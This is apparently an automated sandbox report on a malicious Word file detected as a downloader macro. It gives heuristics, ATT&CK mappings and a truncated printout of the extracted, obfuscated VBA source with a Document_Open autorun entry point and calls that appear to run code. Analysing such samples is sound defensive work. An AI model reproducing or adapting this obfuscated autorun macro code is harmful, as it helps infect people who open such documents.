MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with a critical heuristic firing for a downloader macro. The presence of a Document_Open macro and embedded VBA code strongly suggests an attempt to execute malicious code upon opening. While the VBA code is obfuscated, the Document_Open subroutine is a common entry point for macro-based malware, likely to download and execute a secondary payload.
Heuristics 4
-
ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14264 bytes |
SHA-256: ab6535436e238bc6c375249fad96a3bd5f75271622e44f6918007316e0f2a0e4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim fertilizable As Long
Dim apodal As String
chipewyan = "elanoides"
transgfress = "crokscrew"
nundinate
affinity = 37 + 3
Pmt 0, affinity, 11989, 48916, 2
End Sub
Sub ControlWord()
Dim objWord As New Word.Application
Dim rsContacts As New ADODB.Recordset
Dim strLtrContent As String
rsContacts.ActiveConnection = CurrentProject.Connection
rsContacts.Open "tblContacts"
objWord.Documents.Add
Do While Not rsContacts.EOF
strLtrContent = rsContacts("FirstName") & " " & rsContacts("LastName")
strLtrContent = strLtrContent & rsContacts("Address") & vbCrLf
strLtrContent = strLtrContent & rsContacts("City") & ", " & rsContacts("Region")
strLtrContent = strLtrContent & " " & rsContacts("PostalCode")
strLtrContent = strLtrContent & "Dear " & rsContacts("FirstName") & " "
strLtrContent = strLtrContent & rsContacts("LastName") & ":"
objWord.Selection.EndOf
objWord.Selection.Text = strLtrContent
objWord.Selection.EndOf
objWord.Selection.InsertBreak
rsContacts.MoveNext
Loop
objWord.Visible = True
objWord.PrintPreview = True
End Sub
Function dumbbell(amboyna, nonrestrictive, sapporo)
Dim erection As Integer
Dim superintendent As Long
Dim nice As LongPtr
Dim barrette As LongPtr
Dim hopeless As LongPtr
Dim flown As String
Dim veniam As LongPtr
Dim enigmatic As LongPtr
cwater = Fix(254)
bachelorship = Fix(317)
barrette = amboyna
enigmatic = sapporo
queens = queens
veniam = nonrestrictive
retentive = 4 + 36
Pmt 0, retentive, 23764, 51779, 2
perturb = "apostrophe"
nice = 128 - 62 - 67
amassed ByVal nice, _
barrette, _
veniam, enigmatic, _
hopeless
bachelorship = Rnd(453)
End Function
Function innovation(biographer, footloose, legitimateness)
Dim newport As Long
Dim unbeauteous As Long
Dim chirpiness As Long
Dim unquenchable As Integer
Dim uncopied As Long
Dim appetitive As Byte
Dim goldfields As Long
Dim poronotus As Variant
Dim emulation As Long
Dim moneymaker As Variant
Dim offbroadway As Long
bachelorship = Math.Round(461)
selfenclosed = "berberis"
newport = biographer
emulation = legitimateness
bachelorship = Fix(233)
uncopied = footloose
podilymbus = 36 + 6
Pmt 0, podilymbus, 19222, 14937, 4
perturb = weasand
chirpiness = 109 - 40 - 70
amassed ByVal chirpiness, newport, uncopied, emulation, goldfields
bachelorship = cwater \ 280
End Function
Sub nundinate()
Dim hounds As String
Dim august As Integer
masticophis.ignavus.Value = Day(#12/5/2013#)
varday = cozen = "iledefrance"
fade = "postganglionic"
geoffroea = "falco"
shrewish = "oscillogram"
twenties = "clew"
saxicola = "heliograph"
fluidity = "heritage"
Set berth = masticophis.ignavus.SelectedItem
reservedly = 51 + 23
Pmt 0, reservedly, 14147, 32592, 7
mangosteen = berth.Name
clammily = 118 - 97 + 7823
safe = Right(mangosteen, clammily)
developed = bestiality.scrannel(safe)
caligation = 34 + 21
Pmt 0, caligation, 8110, 40852, 7
pardonner = "specialize"
#If (46 - 39 + 393 + 12 - 69 + 357) > ((122 - 110 + 308) - (126 - 97 + 511) * 1) And ((66 - 92 + 54) - (39 - 33 + 22)) * 2 < (Win64) Then
Dim deepread As Byte
Dim argil As LongPtr
Dim aperit As LongPtr
Dim suppliant As Byte
#ElseIf (4 - 50 + 446 + 38 - 119 + 381) > ((3 - 100 + 417) - (24 - 41 + 557) * 1) And Not ((83 - 12 - 43) - (29 - 43 + 42)) * 2 < (Win64) Then
Dim serrulate As Variant
Dim aperit As Long
Dim amygdalus As Variant
Dim argil As Long
#End If
pomoxis = 39 - 105 + 66
naranjilla = "allodial"
circumfuse = 48 - 126 + 4174
qs = 7 + 55
Pmt 0, qs, 29858, 26034, 5
foul = conditionally
comprise = "harsh"
patten = boletellus
nonruminant
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.